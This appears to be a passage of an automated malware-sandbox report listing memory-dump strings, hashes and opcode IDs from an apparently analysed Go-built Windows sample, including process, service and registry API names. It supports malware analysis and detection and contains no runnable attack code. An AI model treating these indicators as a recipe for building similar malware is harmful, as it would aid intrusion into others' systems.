                                                                                • zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarM, xrefs: 00AD27B7
                                                                                • freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b, xrefs: 00AD2611
                                                                                • (bad use of unsafe.Pointer? try -d=checkptr)PE image does not contains a COFF symbol tablebytes.Reader.UnreadByte: at beginning of sliceedwards25519: invalid field element input sizefirst path segment in URL cannot contain coloninvalid e_lfanew value. Probab, xrefs: 00AD263B
                                                                                • marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneifor, xrefs: 00AD2751
                                                                                • , elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLib, xrefs: 00AD25E7
                                                                                • ., xrefs: 00AD2644
                                                                                • runtime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18strings.Builder.Grow: negative countsyntax e, xrefs: 00AD25C5
                                                                                • alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHe, xrefs: 00AD26FF
                                                                                • found pointer to free objectgcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid P224Element encodinginvalid P384Element encodinginvalid P521Element encodinginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sw, xrefs: 00AD285C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-760742341
                                                                                • Opcode ID: 59537ceeee8166b05eadd2d89912bdc1744dba01f320f3e82e1022617d566629
                                                                                • Instruction ID: 8297cd8557e287588c782f69e9e96a249a2b68c376537dcb12e6a66d1dadd424
                                                                                • Opcode Fuzzy Hash: 59537ceeee8166b05eadd2d89912bdc1744dba01f320f3e82e1022617d566629
                                                                                • Instruction Fuzzy Hash: 7871F4748097818AC340EF75D29172EBBE0AF99708F84895EE8D98B382D774D944DB63
                                                                                Strings
                                                                                • - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNa, xrefs: 00B06620
                                                                                • types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st, xrefs: 00B06538
                                                                                • not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00B064E9
                                                                                • out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlS, xrefs: 00B065F6
                                                                                • runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x, xrefs: 00B065A8
                                                                                • runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00B06494, 00B065CB
                                                                                • !, xrefs: 00B0665D
                                                                                • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy, xrefs: 00B064BF
                                                                                • runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangescalar has high bit set illegallyslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fi, xrefs: 00B06654
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-4105162765
                                                                                • Opcode ID: e4de1a3e6fbf3a33fb445f0fab891ce84f5fe4a60ea7bb7fe35ca1b035064efe
                                                                                • Instruction ID: bacec398948c73afd6405331afba7471988639bca544d31935d398e268090fbd
                                                                                • Opcode Fuzzy Hash: e4de1a3e6fbf3a33fb445f0fab891ce84f5fe4a60ea7bb7fe35ca1b035064efe
                                                                                • Instruction Fuzzy Hash: 4761F2B4909B459FC304EF75D19576EBBE0BF88708F80896DE88887392E774D9488B52
                                                                                Strings
                                                                                • MB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoNtResumeThreadOS/2 characterOaBuildVersionOleLoadPictureOpenSCManagerWOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRCodeNameErrorRegSetValueExWSafeArrayRedimSetConsoleModeSetFilePointerSetThrea, xrefs: 00AD1291
                                                                                • X*, xrefs: 00AD1209
                                                                                • pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMu, xrefs: 00AD1328
                                                                                • pacer: sweep done at heap size pattern contains path separatorpkcs7: unsupported algorithm %q : negative cap : negative len : Len of non-array type : NumIn of non-func typeresetspinning: not a spinning mruntime: can, xrefs: 00AD125A
                                                                                • sweeper left outstanding across sweep generationsx509: Ed25519 key encoded with illegal parametersx509: invalid RDNSequence: invalid attribute typeExport directory contains zero number of functionsGlobal pointer register offset outside of PE imageMust have eit, xrefs: 00AD1361
                                                                                • 1, xrefs: 00AD136A
                                                                                • mismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacenot a PE file, smaller than tiny PEpersistentalloc: align is too largepidleput: P has non-empty run queue of non-slice typeruntime: close , xrefs: 00AD134B
                                                                                • MB during sweep; swept Marquesas Standard TimeMauritius Standard TimeNoncharacter_Code_PointNtSetInformationProcessP224 point not on curveP384 point not on curveP521 point not on curveQueryServiceLockStatusWQyzylorda Standard TimeRegNotifyChangeKeyValueRtlGetN, xrefs: 00AD12D8
                                                                                • pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoEx, xrefs: 00AD1302
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-842453239
                                                                                • Opcode ID: a266e13b845ff1945393f0adefcc246a38963899035d6b0c41cf76a08811079c
                                                                                • Instruction ID: 63179950391efd1b5dade2a49644ae77fe2939e8a563513edf40bbc8cde88c6d
                                                                                • Opcode Fuzzy Hash: a266e13b845ff1945393f0adefcc246a38963899035d6b0c41cf76a08811079c
                                                                                • Instruction Fuzzy Hash: 115126B46087458FC304EF29D19462EBBF0FB89348F808A2EF89997351E734D985CB52
                                                                                Strings
                                                                                • , xrefs: 00ACAD77
                                                                                • mark - bad statusmarkBits overflownil resource bodyno data availablenotetsleepg on g0permission denied : New(nil) : call of runtime/internal/runtime: level = runtime: nameOff runtime: pointer runti, xrefs: 00ACA958
                                                                                • runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p statex509: malformed is, xrefs: 00ACADB5
                                                                                • , goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniM, xrefs: 00ACA8FA, 00ACAD10, 00ACADDA
                                                                                • can't scan our own stackconnection reset by peerdouble traceGCSweepStartflate: maxBits too largefloating point exceptionfunction not implementedgcDrainN phase incorrecthash of unhashable type initSpan: unaligned baseinvalid argument to Intnlevel 2 not synchron, xrefs: 00ACAC9B
                                                                                • runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host nam, xrefs: 00ACA8D5, 00ACACEB
                                                                                • scanstack: goroutine not stoppedslice bounds out of range [%x::]slice bounds out of range [:%x:]slice bounds out of range [::%x]software caused connection abortsweep increased allocation counttransform: short internal bufferuse of closed network connectionx509, xrefs: 00ACAD6E
                                                                                • , gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standard TimeGC work not f, xrefs: 00ACA924, 00ACAD3A, 00ACAE04
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-3675785163
                                                                                • Opcode ID: bdab50c62cfe7612111f4f29217d7001c6e03630d91395c92783b67f612c84e8
                                                                                • Instruction ID: 3c6016fcb2fa342a1f58b0291a61718627eb441dd91a0726fe7c240d98256cbc
                                                                                • Opcode Fuzzy Hash: bdab50c62cfe7612111f4f29217d7001c6e03630d91395c92783b67f612c84e8
                                                                                • Instruction Fuzzy Hash: D822D274508788CFC764EF65D694BAABBF0BF88308F01892DE4898B351E774D948DB42
                                                                                Strings
                                                                                • no goroutines (main called runtime.Goexit) - deadlock!runtime: signal received on thread not created by Go.x509: cannot verify signature: algorithm unimplementedx509: invalid RDNSequence: invalid attribute value: %s is currently not supported for use in syste, xrefs: 00AF031B
                                                                                • mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEven, xrefs: 00AF039C
                                                                                • checkdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing traceGCSweepStartnet/url: invalid userinfono buffer space availableno such de, xrefs: 00AF02F6
                                                                                • checkdead: inconsistent counts : invalid public key : verification errorfailed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid PE file signature: % xinvalid network interface nameinvalid pointer foun, xrefs: 00AF03FC
                                                                                • nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaM, xrefs: 00AF03C7
                                                                                • 6, xrefs: 00AF0324
                                                                                • nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitia, xrefs: 00AF0371
                                                                                • all goroutines are asleep - deadlock!cannot exec a shared library directlycipher: message authentication failed : incorrect GCM tag size : invalid buffer overlap : public exponent too large : public exponent too small , xrefs: 00AF0295
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEven$ nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitia$ nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaM$6$all goroutines are asleep - deadlock!cannot exec a shared library directlycipher: message authentication failed : incorrect GCM tag size : invalid buffer overlap : public exponent too large : public exponent too small $checkdead: inconsistent counts : invalid public key : verification errorfailed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid PE file signature: % xinvalid network interface nameinvalid pointer foun$checkdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing traceGCSweepStartnet/url: invalid userinfono buffer space availableno such de$no goroutines (main called runtime.Goexit) - deadlock!runtime: signal received on thread not created by Go.x509: cannot verify signature: algorithm unimplementedx509: invalid RDNSequence: invalid attribute value: %s is currently not supported for use in syste
                                                                                • API String ID: 0-939784458
                                                                                • Opcode ID: 40b9d7ef04b959403774e57d9d941842d2a636390763bfbf2f5d465689944f0d
                                                                                • Instruction ID: 794aafb2923c61b524c03a7b0ca34785eb3752e1e76d23903d938c536e393ed6
                                                                                • Opcode Fuzzy Hash: 40b9d7ef04b959403774e57d9d941842d2a636390763bfbf2f5d465689944f0d
                                                                                • Instruction Fuzzy Hash: 05818DB4A083488FC704EF76D694B6EBBE1BF85304F04892DE98987352E7709948CF52
                                                                                Strings
                                                                                • greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacenot a PE file, smaller than tiny PEpersistentalloc: align is too largepidleput: P has, xrefs: 00ACC20F
                                                                                • marking free objectmarkroot: bad indexmissing ']' in hostmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no, xrefs: 00ACC1F9
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACC151
                                                                                • #, xrefs: 00ACC218
                                                                                • found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitec, xrefs: 00ACC127
                                                                                • basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845, xrefs: 00ACC196
                                                                                • runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foun, xrefs: 00ACC0FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitec$#$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845$greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacenot a PE file, smaller than tiny PEpersistentalloc: align is too largepidleput: P has$marking free objectmarkroot: bad indexmissing ']' in hostmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no$runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foun
                                                                                • API String ID: 0-3153111096
                                                                                • Opcode ID: c6e9ee946a943356a907c5f5c8a1dd2d2947c99a423a25568c024460f7752563
                                                                                • Instruction ID: 28beed07569494f954e3ae3bf6edd7da3547a332e684d4d9a0ed3d06974a6702
                                                                                • Opcode Fuzzy Hash: c6e9ee946a943356a907c5f5c8a1dd2d2947c99a423a25568c024460f7752563
                                                                                • Instruction Fuzzy Hash: 5C8169746087408FC700EF29D190B6ABBE0BF89718F45896DE8D88B342D775D946CF92
                                                                                Strings
                                                                                • (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidG, xrefs: 00B0575E
                                                                                • [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:, xrefs: 00B0571F
                                                                                • , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00B057FA
                                                                                • unknown wait reasonwinmm.dll not foundx509: malformed OIDx509: trailing datax509: unknown errorzero length segment markroot jobs done to unallocated span37252902984619140625Arabic Standard TimeAssemblyRefProcessorAzores Standard TimeCertFindChainInStoreCertOp, xrefs: 00B05638
                                                                                • minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExte, xrefs: 00B057CC
                                                                                • goroutine impossibleinvalidptrmSpanInUsenotifyListowner diedruntime: gs.state = schedtracesemacquiresetsockoptstackLarget.Kind == terminatedticks.lock (time.Localtracefree(tracegc()unixpacketunknown pcuser32.dllws2_32.dll of size (targetpc= , plugi, xrefs: 00B056F5
                                                                                • ???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNaNNkoNovOctPC=PDTPGIPGOPGUPKTPSTR10R11R12R13R14R15RAXRBPRBXRCXRDIRDXRSARSIRSPSETSatSepStdSunTLSTSSThuTueURIUTCUs, xrefs: 00B05610
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidG$ [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:$ minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExte$, locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFileMappingWCreateWellKnownSidCryptUnp$???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNaNNkoNovOctPC=PDTPGIPGOPGUPKTPSTR10R11R12R13R14R15RAXRBPRBXRCXRDIRDXRSARSIRSPSETSatSepStdSunTLSTSSThuTueURIUTCUs$goroutine impossibleinvalidptrmSpanInUsenotifyListowner diedruntime: gs.state = schedtracesemacquiresetsockoptstackLarget.Kind == terminatedticks.lock (time.Localtracefree(tracegc()unixpacketunknown pcuser32.dllws2_32.dll of size (targetpc= , plugi$unknown wait reasonwinmm.dll not foundx509: malformed OIDx509: trailing datax509: unknown errorzero length segment markroot jobs done to unallocated span37252902984619140625Arabic Standard TimeAssemblyRefProcessorAzores Standard TimeCertFindChainInStoreCertOp
                                                                                • API String ID: 0-478029356
                                                                                • Opcode ID: 45e7d6f23169339fa02b8c47f04f2790c175ff9c32f8edae486c394f0564f05f
                                                                                • Instruction ID: bc211f3bd255fef1fa6474cb33bc8f1af66ab59f4b6686dafb387ebbee3679c1
                                                                                • Opcode Fuzzy Hash: 45e7d6f23169339fa02b8c47f04f2790c175ff9c32f8edae486c394f0564f05f
                                                                                • Instruction Fuzzy Hash: C7717E74909B458FC310EF69D18165EBBE0FF88748F80896DE8888B392D770D845DF92
                                                                                Strings
                                                                                • of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout3051757, xrefs: 00AC0FEE
                                                                                • runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testx509: cannot parse URI %q: invalid domain1734723475976807094411924481391906738281258673617379884, xrefs: 00AC1062
                                                                                • runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid names, aborting parsingx509: cannot parse IP address of length x509: malformed extension critical field34694469519536141888238489627838134765625MapIter.Next called, xrefs: 00AC0F42, 00AC0FC4
                                                                                • runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18strings., xrefs: 00AC0F87, 00AC104C
                                                                                • ), xrefs: 00AC106B
                                                                                • with GC prog is unavailable,M3.2.0,M11.1.00601021504Z0700476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAddDllDirectoryAlign 128-BytesAlign 265-BytesAlign 512-BytesCLSIDFromStringCreateErrorInfoCreateHardLinkWCustomAttributeDeviceIoControlDllCa, xrefs: 00AC0F6C
                                                                                • but memory size because dotdotdot in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandL, xrefs: 00AC1018
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: but memory size because dotdotdot in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandL$ of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout3051757$ with GC prog is unavailable,M3.2.0,M11.1.00601021504Z0700476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAddDllDirectoryAlign 128-BytesAlign 265-BytesAlign 512-BytesCLSIDFromStringCreateErrorInfoCreateHardLinkWCustomAttributeDeviceIoControlDllCa$)$runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18strings.$runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid names, aborting parsingx509: cannot parse IP address of length x509: malformed extension critical field34694469519536141888238489627838134765625MapIter.Next called$runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testx509: cannot parse URI %q: invalid domain1734723475976807094411924481391906738281258673617379884
                                                                                • API String ID: 0-1146393311
